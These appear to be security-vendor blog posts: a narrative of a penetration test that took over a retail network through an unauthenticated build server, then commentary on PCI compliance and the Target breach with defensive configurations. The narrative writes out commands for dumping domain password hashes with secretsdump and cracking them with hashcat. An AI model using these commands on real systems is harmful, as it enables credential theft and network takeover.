The Truth About Breaching Retail Networks

How we breached a retail network using our manual penetration testing methodology

Netragard
We recently delivered an Advanced Persistent Threat (APT) Penetration Test to one of our customers. People who know us know that when we say APT we're not just using buzzwords. Our APT services maintain a 98% success rate at compromise, while our unrestricted methodology maintains a 100% success rate at compromise to date. (In fact, we offer a challenge to back up our stats: if we don't penetrate with our unrestricted methodology, your test is free.) Let's begin the story of a large retail customer that wanted our APT services.
When we deliver covert engagements we don't use the everyday and largely ineffective "low and slow" methodology. Instead, we use a realistic offensive methodology that incorporates distributed scanning, custom tools, and zero-day malware (RADON), among other things. We call this methodology Real Time Dynamic Testing™ because it is delivered in real time and is dynamic. At the core of our methodology are components normally reserved for vulnerability research and exploit development. Needless to say, our methodology has teeth.
Our customer (the target) wanted a single /23 attacked during the engagement. The first thing we did was perform reconnaissance against the /23 so that we knew what we were up against. Reconnaissance in this case involved distributed scanning and revealed a large number of HTTP and HTTPS services running on 149 live targets. The majority of the pages were uninteresting and provided static content, while a few provided dynamic content.
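For readers who want a feel for this reconnaissance step, the sketch below sweeps a /23 for common web ports with nmap. It is purely illustrative: it is not the distributed scanning tooling we used on this engagement, and the xx.xx.xx.0/23 placeholder follows the redaction style used in the output later in this post.

# sweep the target /23 for common web ports and grab service banners
nmap -p 80,443,8080,8443 -sV --open -oA web-recon xx.xx.xx.0/23
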
While evaluating the dynamic pages we came across one called Make Boss. The application appeared to be custom-built for the purpose of managing software builds. What really snagged our attention was that the application didn't support any sort of authentication; instead, anyone who visited the page could use it.
We quickly noticed that the application allowed us to generate new projects. Then we noticed that we could point those new projects at any SVN or Git repository, local or remote. We also identified a hidden, questionable page named “list-dir.php” that enabled us to list the contents of any directory that the web server had permission to access.
We used “list-dir.php” to enumerate local users by guessing the contents of “C:\document~1” (the Documents and Settings folder). In doing so we identified useful directories like “C:\MakeBoss\Source” and “C:\MakeBoss\Compiled”. The existence of these directories told us that projects were built on and fetched from the same server.
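To give a sense of what that interaction looked like, the request below is a reconstruction rather than a capture from the engagement; the "dir" parameter name is assumed, since we aren't publishing the page's actual parameters, and the backslash is URL-encoded as %5C.

# hypothetical request against the directory-listing page (parameter name assumed)
curl "http://xx.xx.xx.xx/list-dir.php?dir=C:%5Cdocument~1"
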
The next step was to see whether we could get the Make Boss application to establish a connection with a repository that we controlled. To do this we set up an external listener using netcat in our lab. Then we configured a new project called “_Netragard” in Make Boss in such a way that it would connect to our listener. The test was a success, as shown by the redacted output below.

[redacted@lab1.netragard.com:~]$ nc -l -p 8888 -v
listening on [any] 8888 ...
xx.xx.xx.xx: inverse host lookup failed: Unknown server error : Connection timed out
connect to [xx.xx.xx.xx] from (UNKNOWN) [xx.xx.xx.xx] 1028
OPTIONS / HTTP/1.1
Host: lab1.netragard.com:8888
User-Agent: SVN/1.6.4 (r38063) neon/0.28.2
Keep-Alive:
Connection: TE, Keep-Alive
TE: trailers
Content-Type: text/xml
Accept-Encoding: gzip
DAV: http://subversion.tigris.org/xmlns/dav/svn/depth
DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops
Content-Length: 104
Accept-Encoding: gzip
 
<?xml version="1.0" encoding="utf-8"?><D:options xmlns:D="DAV:"><D:activity-collection-set/></D:options>

With communications verified we set up a real instance of SVN and created a weaponized build.bat file. We selected build.bat because we knew that Make Boss would execute it server-side, and if done right we could use it to infect the system. (A good reference for setting up Subversion can be found here: http://subversion.apache.org/quick-start). Our initial attempts at getting execution failed due to file system permissions. We managed to get successful execution of our build.bat by changing our target directory to “C:\TEMP” rather than working from the standard web server directories.
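For readers curious about the repository side of this, the sketch below is a minimal, generic Subversion setup and a benign build.bat, not the configuration or payload we actually used. Paths, names, and the choice of svnserve (rather than the HTTP/DAV front end implied by the handshake above) are all illustrative.

# stand up a Subversion repository under our control (paths and names illustrative)
svnadmin create /srv/svn/makeboss-poc
svn import ./project file:///srv/svn/makeboss-poc/trunk -m "initial import"
svnserve -d -r /srv/svn

:: build.bat - benign proof that the build script runs server-side
whoami > C:\TEMP\poc.txt
ipconfig /all >> C:\TEMP\poc.txt
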
With execution capabilities verified, we modified our build.bat file so that it would deploy RADON (our home-grown 0-day pseudo-malware). We used Make Boss to fetch and run our weaponized build.bat, which in turn infected the server running the Make Boss application. Within seconds of infection, our Command & Control server received a connection from the Make Boss server. This represented our first point of penetration.
A note about RADON…
RADON is “safe” as far as malware goes because each strand is built with a pre-defined expiration date. During this engagement RADON was set to expire 5 days after strand generation. When RADON expires it quietly and cleanly self-destructs, leaving the infected system in its original state, which is more than can be said for other “whitehat” frameworks (like Metasploit, etc.).
RADON is also unique in that it's designed for our highest-threat engagements (nation-state style). By design RADON will communicate over both known and unknown covert channels. Known channels are used for normal operation, while covert channels are used for more specialized engagements. All variants of RADON can be switched from known to covert and vice versa from the Command & Control server.
Finally, it’s almost impossible to disrupt communication between RADON and its Command & Control center.  This is in part because of the way that RADON leverages key protocols that all networks depend on to operate.  Because of this, disrupting RADON’s covert channels would also disrupt all network functionality.
Back to the hack…
With the system infected by RADON we were able to take administrative control of the Make Boss server. From there we identified domain administrator credentials that the server was happy to relinquish. We used those credentials to authenticate to the domain controller and extract all current and historical password hashes. Then we used one of our specialized GPU password-cracking machines to process the hashes and deliver the keys to the kingdom.
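We won't document our internal tooling here, but the commands below sketch the equivalent steps with commonly available tools: Impacket's secretsdump to pull current and historical NTLM hashes from a domain controller over DRSUAPI, and hashcat to crack them on GPU hardware. The domain, account, file names, and wordlist are placeholders, not values from the engagement.

# dump current and historical NTLM hashes from the domain controller (prompts for the password)
secretsdump.py -just-dc-ntlm -history -outputfile ntds 'CORP/admin@xx.xx.xx.xx'

# crack the dumped hashes on a GPU rig
hashcat -m 1000 -a 0 -w 3 ntds.ntds wordlist.txt -r rules/best64.rule
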
With that accomplished we had established dominant network position. From this position we were able to propagate RADON to all endpoints and effect an irrecoverable network compromise. Irrecoverable if we were the bad guys, of course, but luckily we're the good guys and our customer recovered just fine. Nevertheless, we had access to everything including, but not limited to, desktops, points of sale, web servers, databases, network devices, etc.
Not surprisingly, our customer's managed security service provider didn't detect any of our activity, not even the mass infection. They did, however, detect what we did next…
As a last step, and to satisfy our customer, we ran two different popular vulnerability scanners. These are the same scanners that most penetration testing vendors rely on to deliver their services. One of the scanners is more network-centric, while the other combines network and web application scanning. Neither scanner identified a single viable vulnerability despite the existence of the (blatantly obvious) one that we exploited above. The only things reported were informational findings like “port 80 open”, “deprecated SSL”, etc.
It's really important to consider this when thinking about the breaches suffered by businesses like Hannaford, Sony, Target, Home Depot and so many others. If the penetration tests you receive are based on the output of vulnerability scanners, and those scanners fail to detect the most obvious vulnerabilities, then where does that leave you? Don't be fooled by testers that promise to deliver “manual penetration tests” either. In most cases they just vet scan reports and call that vetting “manual testing”, which it isn't.


What you don’t know about compliance…

People are always mystified by how hackers break into major networks like Target, Hannaford, and Sony (government networks included). They always seem to be under the impression that hackers have some elite level of skill. The truth is that it doesn't take any skill to break into most networks because they aren't actually protected. Most network owners don't care about security because they don't perceive the threat as real. They suffer from the “it won't ever happen to me” syndrome.
As a genuine penetration testing company we take on dozens of new opportunities per month. Amazingly, roughly 80% of businesses that request services don't want quality security testing; they want a simple check in the compliance box. They perceive quality security testing as an unnecessary and costly annoyance that stands in the way of new revenue. These businesses test because they are required to, not because they want to. The requirements stem from partners, customers, and regulations including, but not limited to, PCI-DSS and HIPAA.
Unfortunately these requirements make the problem worse rather than better. For example, while PCI requires merchants to receive penetration tests, it completely fails to provide any effective or realistic baseline against which to measure the test results. This is also true of HIPAA and other third-party testing requirements. To put this into perspective, if the National Institute of Justice set its V50 or V0 standards in the same manner, then it would be adequate and acceptable to test bulletproof vests with squirt guns. Some might argue that poor testing is better than nothing, but we'd disagree. Testing at less than realistic levels of threat does nothing to prevent the real threat from penetrating.
Shoddy testing requirements and a general false sense of security have combined to create a market where check-in-the-box needs take priority over genuine security. Vendors that sell into this market compete on cost, free service add-ons, and free software licenses rather than quality of service and team capability, and they price illogically based on IP count. Most testing vendors exacerbate the problem because they falsely advertise compliance testing (check-in-the-box) services as best quality. This creates and perpetuates a false sense of security among customers who are not security experts, and also lures in customers who have a genuine security need.
The dangers associated with this are evidenced by the many businesses that have suffered damaging compromises despite being in compliance with various regulations. The recent Target breach (certified as PCI compliant by Trustwave) is just one high-profile example. Target's former CEO, Gregg Steinhafel, was quoted as saying, “Target was certified as meeting the standard for the payment card industry (PCI) in September 2013. Nonetheless, we suffered a data breach.” Another high-profile example is the Hannaford breach (Rapid7's customer at the time) back in 2008. Hannaford, like Target, claims that it too was PCI compliant.
It's our responsibility as security experts to deliver truth to our customers rather than to bank on their lack of expertise. Sure, we're in this to make money, but we also have an ethical responsibility. If we take the time to educate our customers about the differences between compliance testing and genuine penetration testing and they still select compliance testing, then that's fine (it's their risk). But if we lie to our customers and sell them compliance testing while asserting that it's best in class, then we should be held responsible. After all, it's our job to protect people, isn't it?
The irony is that compliance testing typically costs more than genuine penetration testing because it uses an arbitrary count-based pricing methodology. Specifically, if a customer has 10 IP addresses but only 1 of those IP addresses is live, the customer will still be billed for testing all 10 IP addresses. Genuine penetration testing costs less because it uses an Attack Surface Pricing (ASP) methodology. If a customer has 10 IP addresses and only one is live, then ASP will identify that and the customer will only be charged for that 1 IP. Moreover, the customer will be charged based on the complexity of the services provided by that one IP.
If the Return on Investment (RoI) of good security is equal to the cost in damages of a single successful compromise, and if quality penetration testing services cost less (on average) than compliance testing services, doesn't it make sense to purchase quality penetration testing services?
 

The Truth About PCI Compliance. What They Don’t Want You To Know

All of the recent news about Target, Neiman Marcus, and other businesses being hacked might be a surprise to many, but it's no surprise to us. The truth is that the practice of security has devolved into a political, image-focused exercise designed to satisfy technically inept regulatory requirements that do little or nothing to protect critical business assets. What's worse is that many security companies are capitalizing on this devolution rather than providing effective solutions in the spirit of good security. This is especially true with regard to the penetration testing industry.

We all know that money is the lifeblood of business and that a failure to meet regulatory requirements threatens that lifeblood. After all, when a business is not in compliance it runs the risk of being fined or not being allowed to operate. In addition, the imagined expense of true security is often perceived as a financial burden (another lifeblood threat). This is usually because the RoI of good security is only apparent when a would-be compromise is prevented. Too many business managers are of the opinion that “it won't happen to us” until they become a target and it does. These combined ignorant views degrade the overall importance of real security and make the satisfaction of regulatory requirements the top priority. This is unfortunate given that compliance often has little to do with actual security.

Most regulatory requirements are so poorly defined that they can be satisfied with the most basic solution. For example, PCI-DSS requires merchants to undergo regular penetration tests, yet it completely fails to define the minimum level of threat (almost synonymous with quality) at which those tests should be delivered. This lack of clear definition gives business owners the ability to satisfy compliance with the cheapest, most basic testing services. To put this into perspective, if the standards used to test bulletproof vests (the NIJ and HOSDB test methods) were replaced by PCI-DSS, then bulletproof vest testing could be satisfied with a squirt gun.

These substandard regulatory requirements, combined with business owners lacking true security expertise, have formed a market where exceedingly low-quality, low-threat, easy-to-deliver security testing services are in high demand. This market has been answered by a horde of self-proclaimed security experts that in almost all cases are little more than marginally capable script-kids, yet they inaccurately market their services as best in class. Take away their third-party tools (scripts, scanners, Metasploit, etc.) and those vendors will be dead in the water. Take the tools away from a bona fide researcher or hacker and they'll write new tools, then hack you with a vengeance.

The saturation of the penetration testing industry with charlatans makes the process of identifying a quality vendor difficult for business managers who actually care about security. In many cases the consumer is a non-technical (or non-security-expert) buyer who is not able to truly assess the technical capabilities of the vendor. As a result, they often make buying decisions based on non-technical factors like the number of customers serviced, annual revenue, size of company, etc. While these are important factors when evaluating any business, they are by no means a measure of service quality or testing vendor capability. With regard to penetration testing services, quality of service is of the utmost importance and it is a highly technical matter. This is why we wrote a guide to vendor selection that sets a standard of quality and was featured on Forbes.

It is unfortunate that most business owners don't seem to operate in the spirit of good security but instead operate with revenue-focused tunnel vision. The irony of this is that the cost of a quality penetration test is equal to a small fraction of the cost of a single successful compromise. For example, in 2011 Sony suffered a compromise that resulted in over 170 million dollars in damages (not including fines). This compromise was the result of the exploitation of a basic SQL injection vulnerability in a web server (like Target). The average cost of Netragard's web application penetration testing services in 2013 was $14,000.00, and our services would have detected the basic SQL injection vulnerability that cost Sony so much money. Perhaps it's time to rethink the value of genuine penetration testing? Clearly genuine penetration testing has a positive revenue impact through prevention. Specifically, the Return on Investment of a genuine penetration test is equal to the cost in damages of a single successful compromise.
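To put those two figures side by side: $14,000 divided by $170,000,000 is roughly 0.008%, so the test would have cost less than a hundredth of one percent of the reported damages.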

So what of Target?
We know that Target was initially compromised through the exploitation of a vulnerability in one of their web servers (just like Sony and so many others). This vulnerability went unidentified for some time, even after the initial malicious compromise. Why did malicious hackers find this vulnerability before Target did? Why was Target unaware of their existing paths to both compromise and data exfiltration? Who determined that Target was PCI compliant when PCI specifically requires environmental segregation and Target's environment was clearly not properly segregated?

A path to compromise is the path that an attacker must take in order to access sensitive information. In the case of Target, this information was cardholder data. The attackers had no issue exploiting a path to compromise and propagating their attack from the initial point of compromise to the point-of-sale terminals. The existence of this path to compromise should have resulted in a PCI failure, so why didn't it?

A path for data exfiltration is the method that an attacker uses to extract data from a compromised network. In the case of Target, the attackers were able to extract a large amount of information before any sort of preventative response could be taken. This demonstrates that a path for data exfiltration existed and may still exist today. As with the path to compromise, the path for data exfiltration should have resulted in a PCI failure, so why didn't it?

We also know that Target's own security monitoring capabilities were (and probably still are) terrible. Based on a Krebs on Security article, the hackers first uploaded malware to Target's points of sale. Then they configured a control server on Target's internal network to which the malware would report cardholder data. Then the hackers logged in to the control server remotely and repeatedly to download the stolen cardholder data. Why and how did Target fail to detect this activity in time to prevent the incident?
If we use the little information that we have about Target's compromise as a lightweight penetration testing report, we can provide some generic, high-level methods for remediation. What we're suggesting here is hardly a complete solution (because the full details aren't known), but it's good advice nonetheless.

    • Deploy a web application firewall (ModSecurity or something similar); a minimal configuration sketch appears after this list. This would address the issue of the web application compromise (in theory). If one is already deployed then it's in need of a serious reconfiguration, and whoever is charged with its monitoring and upkeep should be either trained properly or replaced (sorry). Most web application vulnerabilities are not exploited on the first try and their exploitation often generates significant noise. That noise likely went unnoticed in the case of Target.

 

    • Deploy a host-based monitoring solution on public-facing servers; a sample active-response configuration appears after this list. This would further address the issue of web server security and would help to prevent distributed metastasis. For companies that want an open-source solution we'd suggest something like OSSEC with the appropriate active-response configurations. For example, tuning OSSEC to monitor and react to system logs, web application firewall incidents, network intrusion incidents, etc. can be highly effective, and it's free. OSSEC can also be used to build blacklists of IP addresses that continually exhibit hostile behavior.

 

    • Deploy a network intrusion prevention solution (like Snort) on the internal network at the demarcation points of the cardholder environment; an example rule appears after this list. If done properly this would help to block the path to compromise and the path for data exfiltration. This solution should be tuned with custom rules to watch for any indication of cardholder data being transmitted out over the network. It should also be tuned to watch for anomalous connections that might be the product of rootkits, etc. In the event that something is detected it should respond in a way that ensures the affected sources and targets are isolated from the rest of the network.

 

    • Deploy a second host-based solution like Bit9 on the points of sale (PoS). (No, we're not a reseller and have no affiliation with Bit9.) This solution should be deployed on the points of sale, assuming that Bit9 will run on them. This would address the issue of malware being deployed on the points of sale and used to steal credit card information, especially malware that was first created in 2013 (BlackPOS).

 

    • Hire a real penetration testing vendor. Given what we know about this compromise, Target hasn't been selecting penetration testing vendors using the right criteria. Any genuine penetration testing vendor that delivers quality services at realistic levels of threat would have identified many of these issues. In fact, it's fair to say that following the methods for remediation that come from a genuine penetration test would have prevented the compromise of cardholder data.
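
As promised in the first three items above, here are minimal configuration sketches for a web application firewall, OSSEC active response, and a Snort exfiltration rule. They are generic starting points built on assumed paths, versions, and thresholds, not configurations taken from Target's environment or from any of our engagements.

A ModSecurity deployment on Apache with the OWASP Core Rule Set might begin with something like this (module and rule-set paths vary by distribution and CRS version):

# excerpt from an Apache ModSecurity configuration (paths illustrative)
LoadModule security2_module modules/mod_security2.so
<IfModule security2_module>
    SecRuleEngine On
    SecAuditEngine RelevantOnly
    SecAuditLog /var/log/httpd/modsec_audit.log
    Include /etc/httpd/modsecurity.d/crs-setup.conf
    Include /etc/httpd/modsecurity.d/rules/*.conf
</IfModule>

An OSSEC active response that temporarily firewalls off the source of high-severity alerts could look like the following ossec.conf excerpt; the level and timeout are values to tune, not recommendations:

<ossec_config>
  <command>
    <name>firewall-drop</name>
    <executable>firewall-drop.sh</executable>
    <expect>srcip</expect>
    <timeout_allowed>yes</timeout_allowed>
  </command>
  <active-response>
    <command>firewall-drop</command>
    <location>local</location>
    <level>10</level>
    <timeout>600</timeout>
  </active-response>
</ossec_config>

And a Snort rule watching for unencrypted card numbers leaving the protected network might be sketched as below. The pattern is deliberately simplistic (16-digit Visa/Mastercard-style numbers with optional separators) and would need tuning and Luhn validation before it produced anything usable:

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible card data exfiltration"; \
    pcre:"/\b(?:4\d{3}|5[1-5]\d{2})([ -]?\d{4}){3}\b/"; \
    classtype:policy-violation; sid:1000001; rev:1;)

None of these snippets is a substitute for the tuning, monitoring, and testing described above; they simply show where each recommendation starts.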

Finally, who do you think did a better job at testing: the hackers that compromised Target, or the penetration testing firm that said they were PCI compliant?